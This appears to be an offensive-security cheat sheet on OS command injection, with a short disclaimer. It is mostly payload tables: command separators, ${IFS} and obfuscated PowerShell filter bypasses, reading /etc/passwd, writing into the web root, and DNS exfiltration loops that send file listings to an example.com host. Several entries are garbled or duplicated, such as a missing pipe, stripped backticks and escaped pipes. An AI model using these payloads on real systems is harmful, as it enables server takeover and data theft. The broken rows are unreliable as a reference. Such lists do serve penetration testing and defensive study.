Disclaimer: This material is provided solely for educational purposes.
You are fully responsible for how
you use the information.
We
do not encourage any kind of illegal or harmful activity.
Command Injection
Command injection permits the execution of arbitrary operating system commands by an attacker on the server hosting an application. This can lead to unauthorized access or control over the application's environment and underlying system, potentially compromising the application and all its data.
Identify Injection Points
- Parameter Injection: Check if any input parameters are directly used in command execution.
- Path Injection: Look for file paths that can be manipulated to include command execution.
- Header Injection: Inspect HTTP headers (e.g., User-Agent, Referer) for possible injection points.
- Cookie Injection: Analyze cookie values for potential command injection vectors.
Determine Context
- Quoted Context: Commands need to break out of quotes (using
" or ') before execution.
- Unquoted Context: Commands are directly appended to the command string.
Basic Command Execution
| Technique |
Description |
ls \| id |
Executes both commands. |
ls \| id |
Pipes the output of ls into id. |
ls && id |
Executes id if ls finishes successfully. |
ls & id |
Executes both but shows the output of only the second command. |
ls %0A id |
Executes both using URL encoded newline (%0A). |
ls |
Executes command within backticks. |
$(ls) |
Executes command within $(). |
ls; id |
Chains commands using semicolon. |
ls${IFS}id |
Uses environment variables to inject commands. |
Bypass Protections
Unix-Specific Techniques
| Technique |
Description |
> /var/www/html/out.txt |
Redirects output to a file. |
< /etc/passwd |
Sends input from a file. |
Windows-Specific Techniques
| Technique |
Description |
powershell.exe -Command "..." |
Executes PowerShell commands. |
cmd.exe /c "..." |
Executes commands using cmd.exe. |
Limitation Bypasses
| Technique |
Description |
powershell C:**2\n??e*d.*? |
Bypasses filters using wildcard characters in PowerShell. |
@^p^o^w^e^r^shell c:**32\c*?c.e?e |
Executes calc using obfuscated PowerShell command. |
ls${LS_COLORS:10:1}${IFS}id |
Uses environment variables and IFS to inject commands. |
Data Exfiltration
Time-Based Data Exfiltration
| Technique |
Description |
time if [ $(whoami cut -c 1) == s ]; then sleep 5; fi |
|
DNS-Based Data Exfiltration
| Technique |
Description |
for i in $(ls /) ; do host "$i.example.com"; done |
Uses DNS queries to exfiltrate data. |
$(host $(wget -h\|head -n1\|sed 's/[ ,]/-/g'\|tr -d '.').example.com) |
Exfiltrates data using DNS and wget. |
Filtering Bypass Techniques
Windows-Specific
| Technique |
Description |
powershell C:**2\n??e*d.*? |
Bypasses filters using wildcard characters in PowerShell. |
@^p^o^w^e^r^shell c:**32\c*?c.e?e |
Executes calc using obfuscated PowerShell command. |
Unix-Specific
| Technique |
Description |
ls${LS_COLORS:10:1}${IFS}id |
Uses environment variables and IFS to inject commands. |
$(ls) |
Executes command within $(). |